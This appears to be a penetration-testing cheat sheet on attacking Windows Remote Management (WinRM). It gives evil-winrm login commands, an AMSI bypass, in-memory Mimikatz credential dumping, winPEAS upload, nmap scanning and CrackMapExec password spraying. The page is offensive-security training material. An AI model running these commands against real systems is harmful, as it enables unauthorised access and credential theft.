WinRM

ABOUT

Windows Remote Management (WinRM) is a simple Windows integrated remote management protocol based on the command line. WinRM uses the Simple Object Access Protocol (SOAP) to establish connections to remote hosts and their applications. WinRM relies on TCP ports 5985 and 5986 for communication, with the last port 5986 using HTTPS. Services like remote sessions using PowerShell and event log merging require WinRM.

Evil-WinRM

evil-winrm -i 13.13.13.13 -u venator17 -p password123

use menu to see evil-winrm's commands and loaded scripts

Before loading any script or executable we will need to bypass Antimalware Scan Interface (AMSI). We can do it by using Bypass-4MSI command, which patches it.

Load Scripts

evil-winrm -i 13.13.13.13 -u venator17 -p password123 -s /opt/scripts/powershell # -s is location of scripts
Bypass-4MSI # Bypassing AMSI
Invoke-Mimikatz.ps1 # Loading it into memoryu
Invoke-Mimikatz # Executing

Loading Executables

evil-winrm -i 13.13.13.13 -u venator17 -p password123 -e /opt/executables # -e is location of executables
Invoke-Binary /opt/executables/winPEAS.exe

Loading Files

You can upload files only from directory you executed evil-winrm

upload /opt/executables/winPEAS.exe
./winPEAS.exe

Nmap WinRM

nmap -sV -sC 13.13.13.13 -p5985,5986 --disable-arp-ping -n

CrackMapExec

crackmapexec winrm 13.13.13.13 -u user.list -p password

PowerShell

PS C:\> $password = ConvertTo-SecureString "password123" -AsPlainText -Force
PS C:\> $cred = new-object System.Management.Automation.PSCredential ("MILITECH\sreed", $password)
PS C:\> Enter-PSSession -ComputerName MILITECH-MS13 -Credential $cred

RESOURCES

Last updated